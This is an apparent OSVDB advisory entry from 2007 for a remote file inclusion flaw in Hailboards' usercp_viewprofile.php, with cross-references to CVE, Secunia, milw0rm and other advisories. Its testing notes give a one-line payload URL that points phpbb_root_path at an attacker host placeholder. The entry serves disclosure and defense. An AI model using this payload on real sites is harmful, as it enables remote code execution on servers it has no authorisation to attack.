Hailboards includes/usercp_viewprofile.php phpbb_root_path Variable Remote File Inclusion

2007-01-31T06:18:27
ID OSVDB:33078
Type osvdb
Reporter OSVDB
Modified 2007-01-31T06:18:27

Description

Manual Testing Notes

http://[target]/[path]/includes/usercp_viewprofile.php?phpbb_root_path=http://[attacker]?

References:

Vendor URL: http://hailboards.org/ Secunia Advisory ID:24002 Other Advisory URL: http://milw0rm.com/exploits/3236 ISS X-Force ID: 31997 FrSIRT Advisory: ADV-2007-0450 CVE-2007-0662 Bugtraq ID: 22333